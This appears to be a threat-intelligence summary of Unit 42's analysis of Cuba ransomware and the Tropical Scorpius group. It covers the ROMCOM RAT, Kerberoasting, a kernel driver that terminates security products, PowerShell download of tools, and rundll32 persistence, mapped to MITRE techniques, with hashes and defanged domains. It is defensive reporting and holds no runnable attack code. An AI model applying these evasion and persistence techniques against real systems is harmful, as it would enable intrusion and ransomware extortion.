Threat Research

Novel News on Cuba Ransomware: Greetings From Tropical Scorpius

Securonix

Unit 42 analyzes Tropical Scorpius (UNC2596) activity, detailing Cuba Ransomware’s evolution with new tools like ROMCOM RAT, KerberCache, and a kernel driver to defeat defenses, plus its connection to the Industrial Spy marketplace. The report covers ransomware capabilities, defense evasion, privilege escalation, lateral movement, C2 channels, and related infrastructure. #CubaRansomware #TropicalScorpius

Keypoints

  • Cuba Ransomware, attributed to Tropical Scorpius (UNC2596), has evolved to include ROMCOM RAT, KerberCache, a kernel driver, and the use of ZeroLogon, with expanded capabilities since 2022.
  • The group employs double extortion with a leak site and has ties to the Industrial Spy data marketplace for exfiltrated data.
  • Initial access includes exploits of Microsoft Exchange vulnerabilities (ProxyShell/ProxyLogon) and distribution via Hancitor attachments.
  • Ransomware functionality encrypts files (FIDEL.CA header, .cuba extension) and prioritizes certain processes; the cryptography uses WolfSSL crypto (ChaCha for file encryption, RSA for key encryption).
  • Defence evasion includes a kernel driver dropper (ApcHelper.sys), unsigned dropper, and rooting out security products; the kernel driver can terminate security software.
  • Kerberos-related credential theft (Kerberoasting) employs GetUserSPNs.ps1 and a tool named KerberCache to extract and use cached tickets.
  • ROMCOM RAT provides a robust C2 channel (HTTP with WinHTTP, ICMP fallback) and a 2.0 variant with expanded commands and local socket behavior (127.0.0.3/2).

MITRE Techniques

  • [T1105] Ingress Tool Transfer – The dropper/tools were downloaded from tmpfiles[.]org using PowerShell’s Invoke-WebRequest. – ‘The local privilege escalation tool leveraged by Tropical Scorpius was initially downloaded from the web hosting platform tmpfiles[.]org by using PowerShell’s Invoke-WebRequest.’
  • [T1059.001] PowerShell – Tools and payloads are downloaded and used via PowerShell (Invoke-WebRequest). – ‘The local privilege escalation tool leveraged by Tropical Scorpius was initially downloaded … using PowerShell’s Invoke-WebRequest.’
  • [T1053.005] Windows System Services: Scheduled Task – ROMCOM 2.0 uses Task Scheduler COM interfaces to register and manage tasks (e.g., task7/startInet). – ‘Table 3. Names of tasks registered through the Task Scheduler COM interfaces.’
  • [T1218.011] Signed Binary Proxy Execution: Rundll32 – ROMCOM uses rundll32.exe to invoke DLL code (mskms.dll) with arguments, enabling execution and C2 beacons. – ‘Finally, an action is set for the task, with the action path to rundll32.exe and the argument set to C:Windowssystem32mskms.dll,ARGUMENT.’
  • [T1543.003] Windows Service – Kernel driver is loaded via a new Windows service, enabling persistent execution and driver actions. – ‘The loader copies the kernel driver responsible for terminating security products onto the file system.’
  • [T1562.001] Impair Defenses – Kernel dropper targets and terminates security products (ApcHelper.sys). – ‘The dropper writes a kernel driver to the file system called ApcHelper.sys. This targets and terminates security products.’
  • [T1071.001] Web Protocols – ROMCOM’s C2 beaconing uses HTTP via WinHTTP, with fallbacks to ICMP for C2. – ‘beacon out to its C2 server’ and ‘If the connection fails, ROMCOM attempts to connect to and communicate with the C2 server using ICMP requests.’
  • [T1041] Exfiltration Over C2 Channel – Exfiltrated data is posted for sale or transmitted to C2/Marketplace (Industrial Spy). – ‘the exfiltrated data was posted for sale on the Industrial Spy marketplace.’

Indicators of Compromise

  • [File Hash] Driver Dropper – 07905de4b4be02665e280a56678c7de67652aee318487a44055700396d37ecd0, af6561ad848aa1ba53c62a323de230b18cfd30d8795d4af36bf1ce6c28e3fd4e
  • [File Hash] ZeroLogon Hacktool – ab5a3bbad1c4298bc287d0ac8c27790d68608393822da2365556ba99d52c5dfb, 6866e82d0f6f6d8cf5a43d02ad523f377bb0b374d644d2f536ec7ec18fdaf576
  • [File Hash] Cuba Ransomware – 0a3517d8d382a0a45334009f71e48114d395a22483b01f171f2c3d4a9cfdbfbf, 0eff3e8fd31f553c45ab82cc5d88d0105626d0597afa5897e78ee5a7e34f71b3
  • [File Hash] Privilege Escalation Tool – a4665231bad14a2ac9f2e20a6385e1477c299d97768048cb3e9df6b45ae54eb8
  • [File Hash] KerberCache Hacktool – cfe7b462a8224b2fbf2b246f05973662bdabc2c4e8f4728c9a1b977fac010c15
  • [File Hash] ROMCOM RAT – B5978cf7d0c275d09bedf09f07667e139ad7fed8f9e47742e08c914c5cf44a53, 324ccd4bf70a66cc14b1c3746162b908a688b2b124ad9db029e5bd42197cfe99
  • [Domain] Infrastructure – CombinedResidency[.]org, optasko[.]com

Read more: https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint